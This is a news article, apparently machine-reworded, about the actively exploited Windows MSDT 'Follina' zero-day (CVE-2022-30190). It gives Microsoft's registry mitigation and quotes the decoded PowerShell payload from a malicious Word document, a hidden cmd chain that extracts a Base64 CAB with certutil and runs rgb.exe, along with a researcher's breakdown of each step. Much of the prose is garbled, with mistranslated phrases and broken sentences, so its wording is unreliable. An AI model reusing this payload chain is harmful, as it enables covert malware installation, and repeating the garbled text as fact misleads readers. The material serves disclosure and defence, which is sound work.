Zero Day Code Execution in Windows Has Been Actively Exploited For 7 Weeks

The word ZERO-DAY is hidden in the middle of a screen filled with letters and zeros.

The zero-day critical code execution in all supported versions of Windows has been actively exploited for seven weeks, giving attackers a reliable means to install malware without activating Windows Defender and a list of other endpoint protection products.

Researchers from Shadow Chasers Team speak above Twitter. One Reply April 21However, it has been informed to the researchers that the Microsoft Security Feedback Center team does not consider the reported behavior a security vulnerability because the MSDT diagnostic tool requires a password before executing the payload.

Uh, never mind

On Monday, Microsoft reversed course, define behavior with vulnerability tracker CVE-2022-30190 and First time warning that the reported behavior ultimately constitutes a critical vulnerability.

“A remote code execution vulnerability exists when MSDT is invoked using the URL protocol from a calling application such as Word,” the advisory said. “An attacker who successfully exploits this vulnerability can run arbitrary code with calling application privileges. The attacker can then install programs, view, change or delete data, or create accounts new account in the context allowed by the user’s permissions.”

At the time of publishing this story, Microsoft had not yet released a patch. Instead, they recommend that customers disable the MSDT URL Protocol by:

  1. Run Command prompt like Manager.
  2. To backup the registry key execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename
  3. Execute command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

Although initially overlooked by Microsoft, the vulnerability was discovered again when a researcher identify a Word document Uploaded to VirusTotal on Friday exploited a previously unknown attack vector.

Based on Analysis by researcher Kevin Beaumont, the document uses Word to retrieve the HTML file from the remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That can’t be,” Beaumont wrote.

Unfortunately, it To be Feasibility.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security company Huntressthe script:

  • Launch hidden windows to:
    • Remove msdt.exe if it is running
    • Loop through the files inside the RAR file, searching for the Base64 string for the encoded CAB file
      • Store this Base64-encoded CAB file as 1 T
      • Decode Base64-encoded CAB files saved as 1 C
      • Extend 1 C CAB file to the current directory, and finally:
      • Execution rgb.exe (presumably compressed inside a 1.c CAB file)

Beaumont also calls attention to this academic paper, in August 2020 showed how to use MSDT for code execution. That said, there was at least one other time that the company’s security team failed to grasp the possibility that this behavior could be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet as protected view, a mode that disables macros and other potentially harmful functions. For reasons that are not clear, Beaumont said, if the document is loaded as a Rich Text Format file, it will “run without even opening the document (via the preview tab in Explorer) rather than opening the document (via the preview tab in Explorer). let alone Protected View.

In other words, the Huntress researchers wrote, an RTF file can “trigger this exploit with just the Preview Pane in Windows Explorer.” In doing so, “this expands the severity of this threat not just by ‘one click’ to exploit, but potentially by ‘no-click’ activation.”

In addition to the document uploaded to VirusTotal on Friday, researchers discovered a separate Word file uploaded on april 12 mines the same day 0.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol is unlikely to create major disruption in the short term and possibly in the long term. During the investigation — at least until Microsoft releases more details and instructions — Office users should turn off the protocol entirely and make any documents downloaded over the Internet subject to extra scrutiny.

Source link


News5s: Update the world's latest breaking news online of the day, breaking news, politics, society today, international mainstream news .Updated news 24/7: Entertainment, the World everyday world. Hot news, images, video clips that are updated quickly and reliably

Related Articles

Back to top button